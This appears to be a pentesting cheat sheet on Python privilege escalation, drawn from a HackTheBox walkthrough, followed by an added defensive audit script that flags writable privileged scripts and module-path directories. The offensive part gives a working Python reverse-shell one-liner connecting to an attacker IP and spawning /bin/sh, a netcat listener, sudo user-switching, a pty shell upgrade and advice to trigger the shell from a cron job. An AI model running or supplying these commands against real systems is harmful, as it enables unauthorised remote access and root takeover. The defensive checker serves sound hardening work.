Privilege Escalation

Python privilege escalation

requirements: you need to be able to plant a *.py file, or modify an existing one, as a higher-privileged user

more at apt-secure.ca

You currently have a terminal (be that in a browser or by some other means). Here are some things to do with Python.

  • Quickly determine which versions of Python are installed locally

    • #whereis python

    • #python -c 'import sys; print(sys.path)' --> get the module search path

  • open a listener on the attacking machine

    • #nc -nlvp 444

    • from the target terminal (web), run python

python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • the attacking machine should now have a shell

  • do you have a list of users?

    • yes

      • because you know the users and their shells, you can potentially switch to one of those users

      • #sudo -u <different user name> /bin/bash (or whatever their shell is)

      • upgrade the shell with python

        • #python -c 'import pty; pty.spawn("/bin/bash");'

        • you may have root at this point

        • you can do a reverse shell from this account

          • open a listener on the attacker

          • run the reverse shell script above. In some scenarios you may need to run the script from an already running cron job

    • no

      • you may not need escalation at this point, but that is unlikely
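
A defender's check for the requirement at the top of these notes, as an added example that is not part of the original page: it reports Python scripts run by privileged jobs, and module search path directories, that a lower-privileged account could write to. The function names, the `trusted_uids` parameter and the sample `job.py` are assumptions made for illustration.

```python
import os
import stat
import tempfile

def weak_perms(path, trusted_uids=(0,)):
    """Return the reasons an account outside trusted_uids could modify path."""
    st = os.stat(path)
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append("owned by uid %d" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_script(script, trusted_uids=(0,)):
    """Check a script run by a privileged job and the directory holding it:
    a writable directory lets the script be replaced or an imported module
    be planted beside it."""
    script = os.path.realpath(script)
    findings = []
    for target in (script, os.path.dirname(script)):
        findings += [(target, r) for r in weak_perms(target, trusted_uids)]
    return findings

def audit_import_path(paths, trusted_uids=(0,)):
    """Check every existing directory on a Python module search path."""
    findings = []
    for entry in paths:
        entry = os.path.realpath(entry or os.getcwd())  # '' means the cwd
        if os.path.isdir(entry):
            findings += [(entry, r) for r in weak_perms(entry, trusted_uids)]
    return findings

def demo():
    """Constructed sample: a job script in a directory anyone can write to."""
    me = (os.getuid(),)  # stand-in for root so the demo runs unprivileged
    root = tempfile.mkdtemp()
    script = os.path.join(root, "job.py")  # hypothetical cron-run script
    with open(script, "w") as fh:
        fh.write("print('nightly job')\n")
    os.chmod(script, 0o644)
    os.chmod(root, 0o777)
    return audit_script(script, me), audit_import_path([root], me)

if __name__ == "__main__":
    for path, reason in demo()[0]:
        print("%s: %s" % (path, reason))
```

On a real host, pass the script paths found in root's crontab to `audit_script` and the output of the `sys.path` command above to `audit_import_path`, leaving `trusted_uids` at its default of root only.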

Reference:

[1] https://danishzia.medium.com/hackthebox-htb-bashed-walkthrough-ab402b9f4715